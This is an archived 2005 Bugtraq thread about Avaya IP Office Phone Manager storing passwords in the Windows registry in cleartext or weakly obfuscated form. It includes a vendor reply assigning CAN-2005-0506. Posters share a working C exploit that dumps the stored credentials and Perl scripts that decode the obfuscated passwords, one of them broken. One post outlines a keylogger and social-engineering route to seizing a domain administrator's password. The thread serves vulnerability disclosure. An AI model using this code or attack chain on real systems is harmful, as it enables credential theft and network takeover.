lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 24 Feb 2005 18:04:45 -0000
From: "PASTOR ADRIAN" <M123303@...hmond.ac.uk>
To: <grutz@...gojango.net>, <bugtraq@...urityfocus.com>
Cc: <jmwalton@...ya.com>
Subject: RE: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability




In my case the key is stored under HKEY_LOCAL_MACHINE

Also, please let's remember that even in the case that the key was stored under HKEY_CURRENT_USER , sensitive information should NEVER be cleartext since an attacker could gain administrative privileges to a single host or even entire Windows network.

It only takes an ERD (Emergency Repair Disk) such as CHNTPW, a good keylogger such as Keykey and a little bit of social engineering (to make the admin login on the machine where the keylogger is running) to grab the administrator's password and gain total control of a host or entire network in the case that domain authentication was used (DOMAIN\USERNAME)

Here is an exploit written in Win32/C with some comments:

8<----------------------------------------------------------------------------------------

#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
		Filename:		exploit.c
		Title:		Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
		Author:		pagvac (Adrian Pastor)
		Date:			24th Feb, 2005
		Other info:		tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

	

BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
     char lszResult[255];
     HKEY hKey;
     LONG returnStatus;
     DWORD dwType=REG_SZ;
     DWORD dwSize=255;
     returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);
     
	 if (returnStatus == ERROR_SUCCESS)
     {
		 returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
          if (returnStatus == ERROR_SUCCESS)
          {
			   strcpy(lszValData, lszResult);
          }
		  RegCloseKey(hKey);
		  return TRUE;
     }
	 else
	 {
		 RegCloseKey(hKey);
		 return FALSE;
     }	
}



void main()
{
	char valData[255];

	printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
	printf("By pagvac (Adrian Pastor)\n");
	printf("Tested on version 2.013\n\n");
	
	// Print username
	printf("Username:\t");
	if(!QueryVal("UserName", valData))
		printf("Error! No permissions to read key value?\n");
	else
		printf("%s\n", valData);
	
	// Print IP address
	printf("PBX IP Address:\t");
	if(!QueryVal("PBXAddress", valData))
		printf("Error! No permissions to read key value?\n");
	else
		printf("%s\n", valData);

	// Print password
	printf("Password:\t");
	if(!QueryVal("Password", valData))
		printf("Error! No permissions to read key value?\n");
	else
	{
		
		if(strcmp(valData, "")==0)
			printf("[blank password]\n\n");
		else
		{
			printf("%s\n", valData);
			printf("Password obsfucated?\n\n");
		}
	}

}

---------------------------------------------------------------------------------------->8


Regards,
pagvac (Adrian Pastor)

-----Original Message-----
From: Walton, John Michael (John) [mailto:jmwalton@...ya.com]
Sent: Thu 2/24/2005 12:16 AM
To: grutz@...gojango.net; bugtraq@...urityfocus.com; PASTOR ADRIAN
Subject: RE: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability
 
Avaya is aware and currently investigating this issue.  Once our
investigation is complete we will release an Avaya Security Advisory to
address the outlined concerns.  In the interim, we've asked Mitre to
assign a Common Vulnerability and Exposures (CVE) candidate number for
this issue.  They have assigned CAN-2005-0506:
 
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0506

Congruent with generally acceptable security practices, Avaya recommends
that customers restrict remote and local access to their systems to
reduce risks.  Alternatively, customers may choose not to utilize the
"Remember save password" feature in order to prevent a user's password
from being stored in the Windows registry.  

Please note the Avaya Product Security Support Team (PSST) takes the
security of Avaya products seriously.  We would like to develop a
relationship with our customers and the public to encourage them to
forward vulnerabilities to us.  Please send information regarding any
discovered security problems with Avaya products to
securityalerts[at]avaya.com.  I, or someone on the PSST, will work
directly to validate the problem and coordinate a response; including an
acknowledgement for working with us to help protect customers.

John Walton, CISSP
Lead Security Engineer
Product Security Support Team (PSST)
Avaya, Inc.

-----Original Message-----
From: grutz@...gojango.net [mailto:grutz@...gojango.net] 
Sent: Tuesday, February 22, 2005 12:06 PM
To: bugtraq@...urityfocus.com
Subject: Re: Avaya IP Office Phone Manager - Sensitive Information
Cleartext Vulnerability

On Tue, Feb 22, 2005 at 11:29:52PM -0000, m123303@...hmond.ac.uk wrote:
> I suspect there is a vulnerability in Avaya IP Office Phone Manager

You suspect correctly.

>From some research we did with this product:

http://www.avaya.com/gcm/master-usa/en-us/products/offers/softphone.htm

> [HKEY_LOCAL_MACHINE\SOFTWARE\Avaya\IP400\Generic]
> "UserName"="Joe Smith"
> "Password"=""
> "PBXAddress"="10.154.1.60"

Our values were found in a different registry location but i'm willing
to bet
the obfuscation is the same. One method of attack is to simply place the
stored 
password in your own registry and hit connect. It's only there because
people
are lazy and just want their phones to work. It's easily reversable:

 ----- 8< --- [ snippy snippy bad code ] --- >8 ----

#!/usr/bin/perl
$avayapw=shift;

my $pwlength = ord(substr($avayapw, 0, 1)) - 33;
my $startpoint = ($pwlength * 7) % 55;

print "Password length: $pwlength\n";
print " Start position: $startpoint\n";

print "\nYour password is: " . substr($avayapw, $startpoint, 1);
my $byte = $startpoint;
for ( my $a = 1; $a<$pwlength; $a++) {
  $nextbyte = $byte - 7;
  if ($nextbyte < 0) {
    $nextbyte = 55 - (7 - $byte);
  }
  $byte = $nextbyte;
  print substr($avayapw, $byte, 1);
}

 ----- 8< --- [ snippy snippy bad code ] --- >8 ----

Shorter:

#!/usr/bin/perl
$a=shift;
$l=ord(substr($a,0,1))-33;
for $c ( 1 .. $l ) {
  print substr($a, (((($l-$c)+1)*7)%55), 1);
}

 ----- 8< --- [ snippy snippy bad code ] --- >8 ----

And something more fun:

#!/usr/bin/perl

use Win32::Registry;

$::HKEY_CURRENT_USER->Open("Software\\Avaya\\iClarity\\Options", $hKey)
or die "Can't open: $^E\n";
$l=ord(substr($value,0,1))-33;
for $c ( 1 .. $l ) {
  print substr($a, (((($l-$c)+1)*7%55), 1);
}




-- 
              ..:[ grutz at jingojango dot net ]:..
 GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
       "There's just no amusing way to say, 'I have a CISSP'."

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ